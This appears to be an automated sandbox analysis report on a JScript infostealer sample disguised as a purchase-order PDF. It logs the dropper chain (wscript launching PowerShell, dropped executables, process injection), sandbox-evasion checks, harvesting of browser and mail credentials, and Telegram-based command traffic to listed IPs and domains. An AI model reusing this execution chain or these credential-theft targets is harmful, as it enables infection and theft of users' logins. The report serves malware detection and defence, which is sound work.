                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597703
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597593
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597484
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597375
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597265
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597156
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597046
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596937
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596828
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596718
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596609
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596500
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596390
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596281
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596172
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596062
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595953
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595843
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595734
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595625
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595515
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595406
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595297
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595187
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595078
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594968
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594859
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594749
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594640
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3187
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3216
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Window / User API: threadDelayed 8537
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Window / User API: threadDelayed 1333
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RUNPEE.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040 Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 8124 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 8080 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -22136092888451448s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -599890s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2172 Thread sleep count: 8537 > 30
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2172 Thread sleep count: 1333 > 30
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -599781s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -599672s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -599562s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -599453s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -599343s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -599234s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -599124s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -599015s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -598906s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -598797s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -598687s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -598578s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -598468s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -598359s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -598250s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -598140s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -598031s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -597922s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -597812s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -597703s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -597593s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -597484s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -597375s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -597265s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -597156s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -597046s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -596937s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -596828s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -596718s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -596609s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -596500s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -596390s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -596281s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -596172s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -596062s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -595953s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -595843s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -595734s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -595625s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -595515s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -595406s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -595297s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -595187s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -595078s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -594968s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -594859s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -594749s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536 Thread sleep time: -594640s >= -30000s
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: powershell.exe, 00000008.00000002.1444855858.000001DE770D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: wscript.exe, 00000000.00000003.1454191109.00000262062E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1456833149.00000262062E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1464059045.0000026208468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1371839650.0000026208468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1462474293.00000262062E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000008.00000002.1444855858.000001DE770D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: x.exe, 0000000A.00000002.1431442252.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: wscript.exe, 00000000.00000002.1464059045.0000026208430000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW06/
                  Source: x.exe, 0000000B.00000002.2536399101.0000000000F17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 11_2_06849668 LdrInitializeThunk
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\wscript.exe Network Connect: 176.65.144.3 80
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Users\user\AppData\Local\Temp\x.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RUNPEE.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1435246368.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR
                  Source: Yara match | File source: dump.pcap, type: PCAP
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara match | File source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1435246368.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2538337454.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1435246368.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR
                  Source: Yara match | File source: dump.pcap, type: PCAP
                  MITRE ATT&CK Matrix (flattened during extraction; the tactic columns are Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Techniques flagged for this sample, with the count shown in the matrix, in matrix order:

                  52 Scripting
                  1 Exploitation for Client Execution
                  52 Scripting
                  1 DLL Side-Loading
                  1 Disable or Modify Tools
                  1 OS Credential Dumping
                  1 File and Directory Discovery
                  11 Archive Collected Data
                  1 Web Service
                  2 PowerShell
                  1 DLL Side-Loading
                  211 Process Injection
                  1 Deobfuscate/Decode Files or Information
                  13 System Information Discovery
                  1 Data from Local System
                  13 Ingress Tool Transfer
                  31 Obfuscated Files or Information
                  1 Security Software Discovery
                  1 Email Collection
                  11 Encrypted Channel
                  1 Software Packing
                  1 Process Discovery
                  3 Non-Application Layer Protocol
                  1 Timestomp
                  51 Virtualization/Sandbox Evasion
                  24 Application Layer Protocol
                  1 DLL Side-Loading
                  1 Application Window Discovery
                  1 Masquerading
                  1 System Network Configuration Discovery
                  51 Virtualization/Sandbox Evasion
                  211 Process Injection
                  Behavior Graph (rendered here as text) ID: 1637032, Sample: PO-2513203-PDF.js, Startdate: 13/03/2025, Architecture: WINDOWS, Score: 100

                  Start node: contacts reallyfreegeoip.org, api.telegram.org and 2 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures. Tries to detect the country of the analysis system (by using the IP) via reallyfreegeoip.org; Uses the Telegram API (likely for C&C communication) via api.telegram.org.

                  wscript.exe (started from the sample): network 176.65.144.3, ports 49717, 49721, 80, PALTEL-ASPALTELAutonomousSystemPS, Germany. Dropped C:\Temp\WTRTRWFSHS.ps1 (ASCII). Signatures: System process connects to network (likely due to code injection or exploit); JScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); 2 other signatures. Starts powershell.exe.

                  powershell.exe: dropped C:\Users\user\AppData\Local\Temp\x.exe (PE32). Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file. Starts x.exe and conhost.exe.

                  x.exe: dropped C:\Users\user\AppData\Local\Temp\RUNPEE.dll (PE32). Signatures: Antivirus detection for dropped file; Injects a PE file into a foreign processes. Starts a second x.exe.

                  x.exe (second instance): network checkip.dyndns.com 132.226.247.73, ports 49725, 49728, 49730, UTMEMUS, United States; api.telegram.org 149.154.167.220, ports 443, 49742, TELEGRAMRU, United Kingdom; reallyfreegeoip.org 104.21.112.1, ports 443, 49726, 49727, CLOUDFLARENETUS, United States. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc).
